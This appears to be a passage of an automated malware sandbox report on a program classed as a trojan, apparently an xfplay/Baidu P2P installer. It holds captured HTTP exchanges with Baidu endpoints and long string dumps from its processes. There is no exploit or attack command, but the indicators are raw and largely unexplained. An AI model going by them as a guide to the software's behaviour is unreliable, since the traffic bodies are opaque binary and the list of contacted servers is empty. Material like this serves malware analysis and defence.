Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.22
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe
0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033015391911494410110713
Server: Apache
tracecode: 00033015391911494410110713
Set-Cookie: BAIDUID=37CF03EF72C69E44C1FECBC156BA5EE4:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h
....<)..8....m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o...p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00128049050818948618110713
Server: Apache
tracecode: 00128049050818948618110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0813C71ECDC5124A9:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00072362801213477898110713
Server: Apache
tracecode: 00072362801213477898110713
Set-Cookie: BAIDUID=A9AAE706CAC814E2200D085686071519:FG=1; expires=Sun, 06-Nov-16 05:00:07 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h
....<)..8....m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o...p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00119517720658453514110713
Server: Apache
tracecode: 00119517720658453514110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA05794EB27122BF6134F:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
.#4H........................................!#$%&"k." ,-.
3234!~:9:;.i.=@ABK..DGHIBKLMOOPQ.STU_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m.............&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."..4t..S...0.@E..Jpz...-...H.;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00145449851213477898110713
Server: Apache
tracecode: 00145449851213477898110713
Set-Cookie: BAIDUID=E927C7BA6E0D653E6B7119B2F952D9BD:FG=1; expires=Sun, 06-Nov-16 05:00:14 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
.#4H........................................!#$%&"k." ,-.
3234!~:9:;.i.=@ABK..DGHIBKLMOOPQ.STU_.b[Z[\U.ebabcK/\ehijc'Wlopqv?Nwvwx}4A~}~......................................................................................................... .........?.m.............&'...l..j..._...........5..Pe%......Z..6.......Y...B....4....q...{.k..Q,7.c=(.`^.{...0.r*..&=.z&,...^.......f....!.......z....c..wg...N...{aP. ...7..KZ.?..j.....R.|...:..........Qb_...~l .0.s...o..xf.d.=9...I....E(.y....d."..4t..S...0.@E..Jpz...-...H.;^}..Y....
.M.......
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00129075050581376522110713
Server: Apache
tracecode: 00129075050581376522110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0FC4D9B271683B1BE:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00017557620315632138110713
Server: Apache
tracecode: 00017557620315632138110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3324C44730134BB38:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
xianfeng.exe_272:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
RegDeleteKeyExW
RegDeleteKeyExW
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
%s=%s
%s=%s
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
pG.lH
pG.lH
d&.iH
d&.iH
(1v%f M*
(1v%f M*
.na;T
.na;T
%SCCg
%SCCg
HJ.Wr
HJ.Wr
Nullsoft Install System v2.46-Unicode
Nullsoft Install System v2.46-Unicode
verifying installer: %d%%
verifying installer: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
*?|/":
*?|/":
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
OCALS~1\Temp\nsf4.tmp\System.dll
OCALS~1\Temp\nsf4.tmp\System.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\ioSpecial.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\ioSpecial.ini
ttp://VVV.xfplay.com
ttp://VVV.xfplay.com
8.9.0 P2P
8.9.0 P2P
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp
nsf4.tmp
nsf4.tmp
\Temp\nsf4.tmp\ioSpecial.ini
\Temp\nsf4.tmp\ioSpecial.ini
8-246WCGQ598DE}) i .r1 ?e
8-246WCGQ598DE}) i .r1 ?e
.2900.5512
.2900.5512
m\LOCALS~1\Temp\nsf4.tmp
m\LOCALS~1\Temp\nsf4.tmp
nfeng.exe
nfeng.exe
6.0.2900.5512
6.0.2900.5512
xianfeng.exe
xianfeng.exe
"%Program Files%\xfplay\xianfeng.exe"
"%Program Files%\xfplay\xianfeng.exe"
%Program Files%\xfplay
%Program Files%\xfplay
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\xfplay\xianfeng.exe
%Program Files%\xfplay\xianfeng.exe
554304191
554304191
1.1.2.1
1.1.2.1
9.0.1 P2P
9.0.1 P2P
iexplore.exe_1676:
%?9-*09,*19}*09
%?9-*09,*19}*09
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
SHLWAPI.dll
SHLWAPI.dll
SHDOCVW.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
IE-X-X
rsabase.dll
rsabase.dll
System\CurrentControlSet\Control\Windows
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
dw15 -x -s %u
watson.microsoft.com
watson.microsoft.com
IEWatsonURL
IEWatsonURL
%s -h %u
%s -h %u
iedw.exe
iedw.exe
Iexplore.XPExceptionFilter
Iexplore.XPExceptionFilter
jscript.DLL
jscript.DLL
mshtml.dll
mshtml.dll
mlang.dll
mlang.dll
urlmon.dll
urlmon.dll
wininet.dll
wininet.dll
shdocvw.DLL
shdocvw.DLL
browseui.DLL
browseui.DLL
comctl32.DLL
comctl32.DLL
IEXPLORE.EXE
IEXPLORE.EXE
iexplore.pdb
iexplore.pdb
ADVAPI32.dll
ADVAPI32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
IExplorer.EXE
IExplorer.EXE
IIIIIB(II<.fg>
IIIIIB(II<.fg>
7?_____ZZSSH%
7?_____ZZSSH%
)z.UUUUUUUU
)z.UUUUUUUU
,....Qym
,....Qym
````2```
````2```
{.QLQIIIKGKGKGKGKGKG
{.QLQIIIKGKGKGKGKGKG
;33;33;0
;33;33;0
8888880
8888880
8887080
8887080
browseui.dll
browseui.dll
shdocvw.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5512 (xpsp.080413-2105)
Windows
Windows
Operating System
Operating System
6.00.2900.5512
6.00.2900.5512
BaiduP2PService.exe_472:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t%SSSPj
t%SSSPj
SWSShX
SWSShX
D$%SP
D$%SP
tGHt.Ht&
tGHt.Ht&
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
mscoree.dll
mscoree.dll
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
kernel32.dll
kernel32.dll
127.0.0.1
127.0.0.1
do exit check, update available=%d
do exit check, update available=%d
xbdyy is running, %d connections
xbdyy is running, %d connections
ProcessRequest spend too much time to finish, Cmd=%d, time = %d ms
ProcessRequest spend too much time to finish, Cmd=%d, time = %d ms
tcp peer closed
tcp peer closed
tcp connection error
tcp connection error
API Call: Type = -
API Call: Type = -
StartTask: h = 0x%p, r=%d
StartTask: h = 0x%p, r=%d
StopTaskAsync: h = 0x%p, r=%d
StopTaskAsync: h = 0x%p, r=%d
StopTaskSync: h = 0x%p, r=%d
StopTaskSync: h = 0x%p, r=%d
FreeTaskHandle: h = 0x%p, r=%d
FreeTaskHandle: h = 0x%p, r=%d
BatchOperation: h = 0x%p, r=%d
BatchOperation: h = 0x%p, r=%d
GetTask List,nRet=%d
GetTask List,nRet=%d
CreateTask: h = 0x%p,r=%d
CreateTask: h = 0x%p,r=%d
DelTempFile: %s\%s
DelTempFile: %s\%s
DelResumeInfo: %s\%s
DelResumeInfo: %s\%s
GetTaskInfo: h = 0x%p, Ret=%d, StatCode=%d, nDownload=%d
GetTaskInfo: h = 0x%p, Ret=%d, StatCode=%d, nDownload=%d
set playing task, handle = %u
set playing task, handle = %u
set playing bitrate = %u
set playing bitrate = %u
set download queue length = %u
set download queue length = %u
set autoupdate on = %u
set autoupdate on = %u
set lang id = %u
set lang id = %u
read length %d, bad boy, closed
read length %d, bad boy, closed
Read nOff=I64i,nLength=d,nRet=%d
Read nOff=I64i,nLength=d,nRet=%d
GET /config/status.html
GET /config/status.html
HTTP/1.1 200 OK
HTTP/1.1 200 OK
1.3.6.1.4.1.311.2.1.12
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
1.2.840.113549.1.9.6
[d-d-d d:d:d.d]
[d-d-d d:d:d.d]
%%x
%%x
Resume Finish [%d]
Resume Finish [%d]
pending request at pid=%I64i timeout %d, clear
pending request at pid=%I64i timeout %d, clear
pending request at pid=%I64i,uids=%I64i,%I64i, timeout=%d, cancel, elapse=%d,duplicate alloc %d
pending request at pid=%I64i,uids=%I64i,%I64i, timeout=%d, cancel, elapse=%d,duplicate alloc %d
no retransmit 3,%d%%, tPending=%d
no retransmit 3,%d%%, tPending=%d
leave emergency, nSpeedTotal=%d, peer speed=%d, rank=%d
leave emergency, nSpeedTotal=%d, peer speed=%d, rank=%d
alloc no piece to %I64i, %d pending, %d partial, %d tail partial, blockset=%d
alloc no piece to %I64i, %d pending, %d partial, %d tail partial, blockset=%d
block done, remove reserve state : peer id=%I64i, blockid=%d
block done, remove reserve state : peer id=%I64i, blockid=%d
%I64i have %d
%I64i have %d
Acc got qid=%s, domain=%s
Acc got qid=%s, domain=%s
Acc got no qid, ret=%d, deny acc
Acc got no qid, ret=%d, deny acc
XXXXXXXX
XXXXXXXX
Acc got host=%u.%u.%u.%u:%u
Acc got host=%u.%u.%u.%u:%u
XXX
XXX
GET %s HTTP/1.1
GET %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: %u.%u.%u.%u:%u
Host: %u.%u.%u.%u:%u
Key: %s
Key: %s
%snOffset=%I64i,%d
%snOffset=%I64i,%d
%d.%d.%d.%d
%d.%d.%d.%d
Task ID = u
Task ID = u
Peers Passive = i
Peers Passive = i
Time Get Login = i ms
Time Get Login = i ms
Time Login = i ms
Time Login = i ms
Lan IP = %s
Lan IP = %s
Wan IP = %s
Wan IP = %s
%s : attention, read file buf the filesize is %I64i, nToRead=%I64i,index=%u
%s : attention, read file buf the filesize is %I64i, nToRead=%I64i,index=%u
%s : attention, it should not be here,read at %I64u(%I64u), no data, return
%s : attention, it should not be here,read at %I64u(%I64u), no data, return
%s : read at %I64u(%I64u), no data, return, index=%u, %I64i
%s : read at %I64u(%I64u), no data, return, index=%u, %I64i
%s : -------------------------------------------------- first buffering time=%d, DLed=%I64i
%s : -------------------------------------------------- first buffering time=%d, DLed=%I64i
%s : ****************************************************** buffering time=%d
%s : ****************************************************** buffering time=%d
%s : read at %I64u(%I64u), return %i, available=%I64i, 0xx,0xx,0xx,0xx, index=%u,%I64i
%s : read at %I64u(%I64u), return %i, available=%I64i, 0xx,0xx,0xx,0xx, index=%u,%I64i
%s : peer %s read callback at %I64u,%I64i,%I64i(%i), not ready
%s : peer %s read callback at %I64u,%I64i,%I64i(%i), not ready
%s : peer %s read callback at %I64u(%i), ready
%s : peer %s read callback at %I64u(%i), ready
%s : DUP, uid=%I64i, pid=%d, kid=%I64i, total=%I64i
%s : DUP, uid=%I64i, pid=%d, kid=%I64i, total=%I64i
%s : DATA uid=%I64i, pid=%d, kid=%I64i, length=%I64i, avail=%I64i
%s : DATA uid=%I64i, pid=%d, kid=%I64i, length=%I64i, avail=%I64i
add reserve state : peer id=%I64i, blockid=%d
add reserve state : peer id=%I64i, blockid=%d
REQ uid=%I64i, pid=%d, kid=%d
REQ uid=%I64i, pid=%d, kid=%d
%s : delete task, index=%u
%s : delete task, index=%u
%s : start p2s, index=%u
%s : start p2s, index=%u
%s : stop p2s, index=%u
%s : stop p2s, index=%u
%s : delete p2p task
%s : delete p2p task
%s : create share memory fail, error=%d
%s : create share memory fail, error=%d
%s : start task, index=%u
%s : start task, index=%u
%s : find resume file
%s : find resume file
%s : load resume file success
%s : load resume file success
%s : file removed
%s : file removed
%s : p2s finish code = %d
%s : p2s finish code = %d
%s : filesize = %I64d, full hash length=%d
%s : filesize = %I64d, full hash length=%d
%s : no p2p fid, choose P2S
%s : no p2p fid, choose P2S
%s : no hash array
%s : no hash array
%s : send full hash done
%s : send full hash done
%s : check url done, code=%d
%s : check url done, code=%d
%s : forbidden
%s : forbidden
%s : network error
%s : network error
%s : stop task, index=%u
%s : stop task, index=%u
%s : AddEmergencyRange(%I64i,%I64i) %I64i
%s : AddEmergencyRange(%I64i,%I64i) %I64i
%s : SetPriorityWindow(%I64i,%I64i)
%s : SetPriorityWindow(%I64i,%I64i)
%s : disk full
%s : disk full
%s : create file error, error=%d
%s : create file error, error=%d
%s : rename fail
%s : rename fail
%s : rename success
%s : rename success
%s : add p2p share
%s : add p2p share
%s : task complete
%s : task complete
%s : no hash array, need report to server
%s : no hash array, need report to server
%s : zero hash at %i, rehash
%s : zero hash at %i, rehash
%s : total verify success, report and add share
%s : total verify success, report and add share
%s : total verify fail
%s : total verify fail
%s : complete download ,but not complete verify, recheck
%s : complete download ,but not complete verify, recheck
%s : send finish info, range count=%d,verified range=%I64i, total=%I64i
%s : send finish info, range count=%d,verified range=%I64i, total=%I64i
%s : create disk file fail
%s : create disk file fail
%s : try write hash piece failed: %I64i - %I64i
%s : try write hash piece failed: %I64i - %I64i
%s : memory verify success: %I64i(%I64i)
%s : memory verify success: %I64i(%I64i)
%s : memory verify fail: %I64i(%I64i)
%s : memory verify fail: %I64i(%I64i)
%s : write piece success: %I64i - %I64i
%s : write piece success: %I64i - %I64i
%s : write piece fail: %I64i - %I64i
%s : write piece fail: %I64i - %I64i
%s : disk verify success at %I64i(%i)
%s : disk verify success at %I64i(%i)
%s : disk verify fail at %I64i(%i)
%s : disk verify fail at %I64i(%i)
%s : GetTaskInfo
%s : GetTaskInfo
%s : peers_add=%d, peers_total=%d, seeders=%d, downloaders=%d
%s : peers_add=%d, peers_total=%d, seeders=%d, downloaders=%d
%s : GetInternalState
%s : GetInternalState
%s : GetTaskStatistics
%s : GetTaskStatistics
%s : GetBlockInfo
%s : GetBlockInfo
%d total,%I64i(%I64i), %d%%
%d total,%I64i(%I64i), %d%%
%s : set task state, state=%d, error=%d
%s : set task state, state=%d, error=%d
%s : set file size = %I64i
%s : set file size = %I64i
%s : load verify range at %I64i(%i)
%s : load verify range at %I64i(%i)
%s : load data at %I64i(%i)
%s : load data at %I64i(%i)
%s : on finish range,peer %I64i
%s : on finish range,peer %I64i
%s : alloc %I64i-%I64i,peer %I64i
%s : alloc %I64i-%I64i,peer %I64i
%s : p2s peer %I64i connected
%s : p2s peer %I64i connected
%s : p2s peer %I64i leave
%s : p2s peer %I64i leave
%s : p2s peer %I64i ready to request : %I64i-%I64i
%s : p2s peer %I64i ready to request : %I64i-%I64i
%s : peer %I64i leave
%s : peer %I64i leave
recv calc verify response, block id=%d, from %I64i
recv calc verify response, block id=%d, from %I64i
crc at %I64i wrong piece %d, find bad boy
crc at %I64i wrong piece %d, find bad boy
%s : may upload bad data, peer id=%I64i
%s : may upload bad data, peer id=%I64i
%s : create p2p task fail, already exists
%s : create p2p task fail, already exists
make a decision, for speed = %dKB/s > 150KB/s
make a decision, for speed = %dKB/s > 150KB/s
make a decision, for elapse 10 seconds, speed = %dKB/s
make a decision, for elapse 10 seconds, speed = %dKB/s
choose P2S, P2S=%d KB/s, %s
choose P2S, P2S=%d KB/s, %s
choose P2P, P2S=%d KB/s
choose P2P, P2S=%d KB/s
call delete_p2p_task, %u
call delete_p2p_task, %u
dup url, url=%s
dup url, url=%s
new task, url=%s
new task, url=%s
ref=%s
ref=%s
tmp=%s
tmp=%s
the same task id %d
the same task id %d
create task, index=%u
create task, index=%u
StopTaskAsync: %u
StopTaskAsync: %u
StopTaskSync: %u
StopTaskSync: %u
fid=%s, url=%s
fid=%s, url=%s
tasks.dat exist, do not check tasks.ini
tasks.dat exist, do not check tasks.ini
read tasks.ini from %s
read tasks.ini from %s
acctrack.kuaibo.com
acctrack.kuaibo.com
acc.p2sp.baidu.com
acc.p2sp.baidu.com
0.0.0.0
0.0.0.0
dudpxp://
dudpxp://
[DUDPXP]
[DUDPXP]
index.html
index.html
%%%2X
%%%2X
hXXp://
hXXp://
PTF://
PTF://
%s:%s@
%s:%s@
%s%s%s%s%s
%s%s%s%s%s
hXXp:///
hXXp:///
hXXp://%s:%d/%s
hXXp://%s:%d/%s
cmp2s.p2sp.baidu.com
cmp2s.p2sp.baidu.com
query?cmd=url2finfo
query?cmd=url2finfo
query?cmd=fid2finfo
query?cmd=fid2finfo
query?cmd=validurl
query?cmd=validurl
commit?cmd=finfo
commit?cmd=finfo
P2SCfg.ini
P2SCfg.ini
Port
Port
%s %s HTTP/1.1
%s %s HTTP/1.1
Content-Length: %d
Content-Length: %d
d:\cygwin\home\scmpf\compiler_src\panfeng02_563106_win32\0\app\gensoft\p2p\client\platform\objs\BaiduP2PService.pdb
d:\cygwin\home\scmpf\compiler_src\panfeng02_563106_win32\0\app\gensoft\p2p\client\platform\objs\BaiduP2PService.pdb
P2PBase.dll
P2PBase.dll
?StatAdd@CP2PStatReport@@QAEX_K0@Z
?StatAdd@CP2PStatReport@@QAEX_K0@Z
?StatAdd@CP2PStatReport@@QAEX_KQAE@Z
?StatAdd@CP2PStatReport@@QAEX_KQAE@Z
?StatAdd@CP2PStatReport@@QAEX_KPAEI@Z
?StatAdd@CP2PStatReport@@QAEX_KPAEI@Z
?SendReport@CP2PStatReport@@QAEHXZ
?SendReport@CP2PStatReport@@QAEHXZ
??1CP2PStatReport@@QAE@XZ
??1CP2PStatReport@@QAE@XZ
??0CP2PStatReport@@QAE@PBD000@Z
??0CP2PStatReport@@QAE@PBD000@Z
P2PStatReport.dll
P2PStatReport.dll
P2SBase.dll
P2SBase.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
iphlpapi.dll
iphlpapi.dll
CryptMsgClose
CryptMsgClose
CertGetNameStringW
CertGetNameStringW
CertFreeCertificateContext
CertFreeCertificateContext
CertFindCertificateInStore
CertFindCertificateInStore
CertCloseStore
CertCloseStore
CryptMsgGetParam
CryptMsgGetParam
CRYPT32.dll
CRYPT32.dll
WINTRUST.dll
WINTRUST.dll
VERSION.dll
VERSION.dll
GetConsoleOutputCP
GetConsoleOutputCP
GetCPInfo
GetCPInfo
.?AV?$FieldVector@VURL@p2s@@@serial@@
.?AV?$FieldVector@VURL@p2s@@@serial@@
.?AVP2SValidUrl@p2s@@
.?AVP2SValidUrl@p2s@@
zcÁ
zcÁ
g\Xbdyy.dll
g\Xbdyy.dll
\bdupdate.exe
\bdupdate.exe
\autoupdate.ini
\autoupdate.ini
\banner.jpg
\banner.jpg
\Baidu\BaiduPlayer\bdupdate.exe
\Baidu\BaiduPlayer\bdupdate.exe
\Baidu\BaiduPlayer\autoupdate.ini
\Baidu\BaiduPlayer\autoupdate.ini
\Baidu\BaiduPlayer\banner.jpg
\Baidu\BaiduPlayer\banner.jpg
\BaiduPlayer.exe
\BaiduPlayer.exe
&Version=%d.%d.%d.%d
&Version=%d.%d.%d.%d
&LangID=%d
&LangID=%d
!\Cabinet.dll
!\Cabinet.dll
@.exe
@.exe
\bugreport.exe
\bugreport.exe
bdbugreport_%u
bdbugreport_%u
CPU : Arch=%d, Type=%d, Level=%d, Rev=%d, No.=%d
CPU : Arch=%d, Type=%d, Level=%d, Rev=%d, No.=%d
MemoryPool : Total=%d, Free=%d
MemoryPool : Total=%d, Free=%d
User : Lang=%d,LCID=%d ; System : Lang=%d,LCID=%d
User : Lang=%d,LCID=%d ; System : Lang=%d,LCID=%d
Memory Corruption : %s
Memory Corruption : %s
"%s" --smname=%s
"%s" --smname=%s
CryptQueryObject failed with %x
CryptQueryObject failed with %x
CryptMsgGetParam failed with %x
CryptMsgGetParam failed with %x
Program Name : %s
Program Name : %s
Publisher Link : %s
Publisher Link : %s
MoreInfo Link : %s
MoreInfo Link : %s
CertFindCertificateInStore failed with %x
CertFindCertificateInStore failed with %x
Signer Certificate:
Signer Certificate:
TimeStamp Certificate:
TimeStamp Certificate:
Date of TimeStamp : d/d/d d:d
Date of TimeStamp : d/d/d d:d
CertGetNameString failed.
CertGetNameString failed.
Issuer Name: %s
Issuer Name: %s
Subject Name: %s
Subject Name: %s
CryptDecodeObject failed with %x
CryptDecodeObject failed with %x
The file "%s" is signed and the signature was verified.
The file "%s" is signed and the signature was verified.
The file "%s" is not signed.
The file "%s" is not signed.
An unknown error occurred trying to verify the signature of the "%s" file.
An unknown error occurred trying to verify the signature of the "%s" file.
Error is: 0x%x.
Error is: 0x%x.
\platform_%d.log
\platform_%d.log
\platform.log
\platform.log
\platform_crush_%d.log
\platform_crush_%d.log
\platform_quit_%d.log
\platform_quit_%d.log
%sV%u
%sV%u
\running.pid
\running.pid
SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}
SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}
BaiduP2PService.exe
BaiduP2PService.exe
FTP://
FTP://
HTTP://
HTTP://
